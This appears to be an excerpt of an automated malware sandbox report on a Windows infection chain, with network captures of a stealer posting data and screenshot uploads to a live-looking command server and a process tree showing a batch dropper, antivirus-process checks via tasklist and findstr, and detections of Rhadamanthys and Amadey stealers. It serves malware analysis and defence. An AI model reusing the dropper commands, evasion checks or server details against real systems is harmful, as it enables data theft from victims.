Apr 14, 2024 08:46:15.824466944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:15.825364113 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:16.166126013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49783	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:16.164243937 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:16.164508104 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:16.164508104 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:16.164508104 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:16.164509058 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:16.164509058 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:16.164611101 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:16.164611101 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:16.164611101 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:16.164640903 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:16.164665937 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:17.353858948 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49784	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:16.630065918 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:16.959806919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:17.019000053 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:17.353250027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49785	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:17.806813955 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:18.143341064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:18.227602959 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:18.569802046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49786	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:18.106606007 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:18.106652975 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:18.106704950 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:18.106734991 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:18.106759071 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:18.106790066 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:18.106812954 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:18.106838942 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:18.106865883 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:18.106888056 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:18.106909037 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:46:20.099117041 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49787	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:19.426429987 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:19.760607958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:19.762083054 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:20.101562023 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49788	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:20.568855047 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:46:20.907403946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:46:20.908787966 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:46:21.261837959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:46:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49789	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:46:21.038537025 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTY= Host: 91.202.233.180 Content-Length: 86548 Cache-Control: no-cache
Apr 14, 2024 08:46:21.038619995 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 59 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTY=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:46:21.038667917 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:46:21.038702011 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:46:21.038702011 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:46:21.038739920 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:46:21.038739920 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:46:21.038758993 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:46:21.038775921 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:46:21.038793087 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:46:21.038809061 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:

Target ID:	0
Start time:	08:44:14
Start date:	14/04/2024
Path:	C:\Users\user\Desktop\J2NWKU2oJi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\J2NWKU2oJi.exe"
Imagebase:	0x400000
File size:	961'456 bytes
MD5 hash:	9E64B65535E29EC152642D8BDCB22974
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:44:14
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:44:14
Start date:	14/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:44:16
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xfc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:44:16
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x1f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:44:16
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xfc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:44:16
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x1f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:44:17
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 331463
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:44:17
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "AdditionUnitKoreanLn" Remembered
Imagebase:	0x1f0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:44:17
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:44:17
Start date:	14/04/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif
Wow64 process (32bit):	true
Commandline:	331463\Pleasure.pif 331463\Q
Imagebase:	0x150000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 7%, ReversingLabs Detection: 1%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:44:18
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0xe20000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:45:05
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\dialer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\dialer.exe"
Imagebase:	0x4d0000
File size:	32'256 bytes
MD5 hash:	E4BD77FB64DDE78F1A95ECE09F6A9B85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:45:05
Start date:	14/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 984
Imagebase:	0x7a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:45:13
Start date:	14/04/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\openwith.exe"
Imagebase:	0x7ff62f700000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2520663901.000001BD779C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2518352508.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2518526497.000001BD7793B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2522953680.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:45:37
Start date:	14/04/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Yuem.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Yuem.exe"
Imagebase:	0xce0000
File size:	437'248 bytes
MD5 hash:	5A14BA286D692A6D65DBCF7340EA1C8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.2522186450.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs Detection: 53%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:45:39
Start date:	14/04/2024
Path:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"
Imagebase:	0xa50000
File size:	437'248 bytes
MD5 hash:	5A14BA286D692A6D65DBCF7340EA1C8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000000.2538475835.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs Detection: 53%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	08:45:40
Start date:	14/04/2024
Path:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Imagebase:	0xa50000
File size:	437'248 bytes
MD5 hash:	5A14BA286D692A6D65DBCF7340EA1C8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
